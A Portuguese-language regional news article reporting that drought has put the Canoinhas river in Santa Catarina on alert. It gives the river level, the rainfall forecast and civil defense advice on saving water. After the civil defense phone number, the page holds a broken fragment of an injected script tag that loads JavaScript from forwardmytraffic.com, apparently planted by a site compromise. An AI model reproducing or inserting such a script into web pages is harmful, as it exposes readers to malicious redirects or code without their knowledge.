InícioCidadeRio Canoinhas entra em estado de alerta

Rio Canoinhas entra em estado de alerta

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

O tempo seco deixou o nível do Rio Canoinhas em alerta. A informação é da Defesa Civil de Canoinhas com base no aviso hidrológico emitido pela Epagri na manhã desta quarta-feira, 2. O rio está com 1,34 metros – várias bacias hidrográficas de Santa Catarina estão em alerta e até emergência por causa da estiagem.

 

 

Pelo registro da estação do Cemaden, que fica no Centro de Canoinhas, não choveu em abril.

 

 

Segundo o Centro de Informações de Recursos Ambientais e de Hidrometeorologia de Santa Catarina da Epagri (Ciram/Epagri) a previsão é de poucos acumulados de chuva para os próximos dias: teremos condição de chuva isolada até o dia 10.

 

 

Somente depois desta data a chuva será mais frequente e melhor distribuída em todas as regiões de SC, segundo a Epagri/Ciram. Entre os dias 13 e 14 uma frente fria chega ao RS e SC trazendo chuva com temporais isolados.

 

 

Além do uso racional da água, o coordenador da Defesa Civil de Canoinhas, Dario Gonçalves, alerta a população para os cuidados com a saúde: “é importante que as pessoas economizem água deixando de lavar calçadas e veículos. Também pedimos atenção redobrada com a saúde tomando líquido e cuidando com o sol e o pó”.

 

 

Em caso de dúvida, entre em contato com a Defesa Civil pelo 199…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.